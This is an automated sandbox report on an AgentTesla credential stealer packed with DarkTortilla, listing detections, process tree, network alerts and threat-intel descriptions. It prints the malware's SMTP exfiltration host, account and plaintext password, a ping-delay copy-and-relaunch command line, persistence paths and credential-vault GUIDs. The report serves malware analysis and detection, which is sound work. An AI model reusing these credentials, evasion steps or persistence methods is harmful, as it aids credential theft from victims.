Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bank Details.exe

Overview

General Information

Sample name:Bank Details.exe
Analysis ID:1501091
MD5:99484dd2aebff67b20e11b5af574a8be
SHA1:dbddda933fbb6bb76004c6a27254575eaede9761
SHA256:a130b1de44bb0e882375378f9c3ddcf94508674164458d76ae06bb9fd36393eb
Tags:exe
Infos:

Detection

AgentTesla, DarkTortilla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Outbound SMTP Connections
Stores files to the Windows start menu directory
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Bank Details.exe (PID: 7720 cmdline: "C:\Users\user\Desktop\Bank Details.exe" MD5: 99484DD2AEBFF67B20E11B5AF574A8BE)
    • cmd.exe (PID: 5432 cmdline: "cmd" /c ping 127.0.0.1 -n 41 > nul && copy "C:\Users\user\Desktop\Bank Details.exe" "C:\Users\user\Desktop\udo.exe" && ping 127.0.0.1 -n 41 > nul && "C:\Users\user\Desktop\udo.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 5588 cmdline: ping 127.0.0.1 -n 41 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • PING.EXE (PID: 3556 cmdline: ping 127.0.0.1 -n 41 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • udo.exe (PID: 3004 cmdline: "C:\Users\user\Desktop\udo.exe" MD5: 99484DD2AEBFF67B20E11B5AF574A8BE)
        • InstallUtil.exe (PID: 6896 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
        • InstallUtil.exe (PID: 4120 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • boqXv.exe (PID: 6940 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • boqXv.exe (PID: 6208 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • conhost.exe (PID: 2124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.azmaplast.com", "Username": "info@azmaplast.com", "Password": "QAZqaz123@@"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1711519526.000000000368B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
      00000000.00000002.1713067974.0000000004702000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.1713067974.0000000004702000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000011.00000002.2877661003.0000000000732000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000011.00000002.2877661003.0000000000732000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 32 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.Bank Details.exe.44b8b92.5.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                0.2.Bank Details.exe.44b8b92.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.Bank Details.exe.44b8b92.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.Bank Details.exe.44b8b92.5.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x31cfc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x31d6e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x31df8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x31e8a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x31ef4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x31f66:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x31ffc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x3208c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    16.2.udo.exe.43dcee2.1.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                      Click to see the 73 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 4120, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boqXv
                      Sigma detected: Startup Folder File Write
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Bank Details.exe, ProcessId: 7720, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\udo.lnk
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 193.141.65.39, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 4120, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49722

                      Suricata Signatures

                      Timestamp:2024-08-29T12:15:51.200916+0200
                      SID:2030171
                      Severity:1
                      Source Port:49722
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-08-29T12:15:51.200916+0200
                      SID:2839723
                      Severity:1
                      Source Port:49722
                      Destination Port:587
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-29T12:15:51.200916+0200
                      SID:2840032
                      Severity:1
                      Source Port:49722
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-08-29T12:19:15.736943+0200
                      SID:2855245
                      Severity:1
                      Source Port:49722
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-08-29T12:19:15.736943+0200
                      SID:2855542
                      Severity:1
                      Source Port:49722
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 0.2.Bank Details.exe.447d9d2.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.azmaplast.com", "Username": "info@azmaplast.com", "Password": "QAZqaz123@@"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\Desktop\udo.exeReversingLabs: Detection: 55%
                      Source: C:\Users\user\Desktop\udo.exeVirustotal: Detection: 43%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: Bank Details.exeReversingLabs: Detection: 55%
                      Source: Bank Details.exeVirustotal: Detection: 43%Perma Link
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\Desktop\udo.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: Bank Details.exeJoe Sandbox ML: detected
                      Source: Bank Details.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000012.00000002.3830643488.0000000005E80000.00000004.00000020.00020000.00000000.sdmp, boqXv.exe, 00000014.00000000.3311816237.0000000000422000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.18.dr
                      Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000012.00000002.3830643488.0000000005E80000.00000004.00000020.00020000.00000000.sdmp, boqXv.exe, 00000014.00000000.3311816237.0000000000422000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.18.dr
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 4x nop then cmp dword ptr [ebp-18h], 00000000h0_2_017D4A21
                      Source: C:\Users\user\Desktop\udo.exeCode function: 4x nop then cmp dword ptr [ebp-18h], 00000000h16_2_01724A21

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.9:49722 -> 193.141.65.39:587
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49722 -> 193.141.65.39:587
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.9:49722 -> 193.141.65.39:587
                      Source: Network trafficSuricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.9:49722 -> 193.141.65.39:587
                      Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.9:49722 -> 193.141.65.39:587
                      Uses ping.exe to check the status of other devices and networks
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 41
                      Source: global trafficTCP traffic: 192.168.2.9:49722 -> 193.141.65.39:587
                      Source: Joe Sandbox ViewIP Address: 193.141.65.39 193.141.65.39
                      Source: Joe Sandbox ViewASN Name: KPNNL KPNNL
                      Source: global trafficTCP traffic: 192.168.2.9:49722 -> 193.141.65.39:587
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: mail.azmaplast.com
                      Source: InstallUtil.exe, 00000012.00000002.3823957553.0000000002B3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.azmaplast.com
                      Source: Bank Details.exe, 00000000.00000002.1713067974.0000000004407000.00000004.00000800.00020000.00000000.sdmp, Bank Details.exe, 00000000.00000002.1713067974.0000000004702000.00000004.00000800.00020000.00000000.sdmp, Bank Details.exe, 00000000.00000002.1713067974.0000000004529000.00000004.00000800.00020000.00000000.sdmp, udo.exe, 00000010.00000002.3840250798.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, udo.exe, 00000010.00000002.3840250798.00000000045BB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.2877661003.0000000000732000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.Bank Details.exe.447d9d2.2.raw.unpack, FaJzHLniypp.cs.Net Code: _5cQa10w
                      Source: 0.2.Bank Details.exe.44b8b92.5.raw.unpack, FaJzHLniypp.cs.Net Code: _5cQa10w
                      Source: 0.2.Bank Details.exe.47020c0.0.raw.unpack, FaJzHLniypp.cs.Net Code: _5cQa10w
                      Source: 0.2.Bank Details.exe.4442802.3.raw.unpack, FaJzHLniypp.cs.Net Code: _5cQa10w
                      Source: 0.2.Bank Details.exe.468bd72.1.raw.unpack, FaJzHLniypp.cs.Net Code: _5cQa10w

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.2.Bank Details.exe.44b8b92.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 16.2.udo.exe.43dcee2.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 17.2.InstallUtil.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 16.2.udo.exe.45f6f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Bank Details.exe.47020c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Bank Details.exe.44b8b92.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 16.2.udo.exe.45f6f20.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 16.2.udo.exe.43a1d22.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Bank Details.exe.4442802.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 16.2.udo.exe.43dcee2.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Bank Details.exe.468bd72.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Bank Details.exe.468bd72.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Bank Details.exe.447d9d2.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Bank Details.exe.47020c0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 16.2.udo.exe.4366b52.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 16.2.udo.exe.43a1d22.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 16.2.udo.exe.4366b52.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Bank Details.exe.447d9d2.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Bank Details.exe.45da998.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Bank Details.exe.4442802.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\Desktop\udo.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A85A880 CreateProcessAsUserW,16_2_0A85A880
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_017D4A210_2_017D4A21
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_017D6CD00_2_017D6CD0
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_017D7AA80_2_017D7AA8
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_017D9FC80_2_017D9FC8
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07CD18480_2_07CD1848
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07CD8C800_2_07CD8C80
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07CDC8D30_2_07CDC8D3
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07CDC8E00_2_07CDC8E0
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07D4D7300_2_07D4D730
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07D411C00_2_07D411C0
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07D4B1980_2_07D4B198
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07D4B18F0_2_07D4B18F
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_08175AA00_2_08175AA0
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_0817497F0_2_0817497F
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_081749A00_2_081749A0
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_0817BA100_2_0817BA10
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_0817C3700_2_0817C370
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_086A23880_2_086A2388
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_086AC2B00_2_086AC2B0
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_086A23780_2_086A2378
                      Source: C:\Users\user\Desktop\Bank Details.exeCode function: 0_2_07D411B30_2_07D411B3
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0172A14016_2_0172A140
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_01724A2116_2_01724A21
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_01726D5816_2_01726D58
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_01727A9816_2_01727A98
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_067DD3E016_2_067DD3E0
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_067DD3D016_2_067DD3D0
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_067DAA7C16_2_067DAA7C
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07D1184816_2_07D11848
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07D18BFC16_2_07D18BFC
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07D1C8D316_2_07D1C8D3
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07D1C8E016_2_07D1C8E0
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07D18C8016_2_07D18C80
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07D1C8AB16_2_07D1C8AB
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07D1FC7816_2_07D1FC78
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07D1FC6816_2_07D1FC68
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07D811C016_2_07D811C0
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DA9BF816_2_07DA9BF8
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DA5BB816_2_07DA5BB8
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DACAFE16_2_07DACAFE
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DAD9A016_2_07DAD9A0
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DA10DE16_2_07DA10DE
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DAAC9016_2_07DAAC90
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DAB8B016_2_07DAB8B0
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DAC0A916_2_07DAC0A9
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DAF35916_2_07DAF359
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DAF36816_2_07DAF368
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DAF65816_2_07DAF658
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DAFA1016_2_07DAFA10
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DAFA0016_2_07DAFA00
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DAD97B16_2_07DAD97B
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DAC12916_2_07DAC129
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DAE88816_2_07DAE888
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DAB88316_2_07DAB883
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DAFC4816_2_07DAFC48
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DA004016_2_07DA0040
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DAE87816_2_07DAE878
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DA003B16_2_07DA003B
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07DAFC3916_2_07DAFC39
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0820238816_2_08202388
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0820C2B016_2_0820C2B0
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0820237816_2_08202378
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A855AE016_2_0A855AE0
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A85AE0016_2_0A85AE00
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A854E4016_2_0A854E40
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A850BF016_2_0A850BF0
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A85337016_2_0A853370
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A85004016_2_0A850040
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A854E2F16_2_0A854E2F
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A850B8716_2_0A850B87
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A85438816_2_0A854388
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A858BB716_2_0A858BB7
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A8577D016_2_0A8577D0
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A8577E016_2_0A8577E0
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A85331816_2_0A853318
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A85336016_2_0A853360
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A8550D916_2_0A8550D9
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A8590E116_2_0A8590E1
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A85000716_2_0A850007
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A8589C816_2_0A8589C8
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A8589D816_2_0A8589D8
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_0A85914016_2_0A859140
                      Source: C:\Users\user\Desktop\udo.exeCode function: 16_2_07D811B316_2_07D811B3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_0288A3E818_2_0288A3E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_0288D73818_2_0288D738
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_02884AD018_2_02884AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_0288981818_2_02889818
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_02883EB818_2_02883EB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_0288420018_2_02884200
                      Source: Bank Details.exe, 00000000.00000002.1710796829.000000000147E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Bank Details.exe
                      Source: Bank Details.exe, 00000000.00000002.1713067974.0000000004407000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename303ccb5a-e74e-425a-949b-a0bf6563c022.exe4 vs Bank Details.exe
                      Source: Bank Details.exe, 00000000.00000002.1713067974.0000000004702000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename303ccb5a-e74e-425a-949b-a0bf6563c022.exe4 vs Bank Details.exe
                      Source: Bank Details.exe, 00000000.00000002.1713067974.0000000004529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs Bank Details.exe
                      Source: Bank Details.exe, 00000000.00000002.1713067974.0000000004529000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename303ccb5a-e74e-425a-949b-a0bf6563c022.exe4 vs Bank Details.exe
                      Source: Bank Details.exe, 00000000.00000002.1715433973.0000000006550000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs Bank Details.exe
                      Source: Bank Details.exe, 00000000.00000000.1360954228.0000000000D78000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameblessed P.exeH vs Bank Details.exe
                      Source: Bank Details.exeBinary or memory string: OriginalFilenameblessed P.exeH vs Bank Details.exe
                      Source: 0.2.Bank Details.exe.44b8b92.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
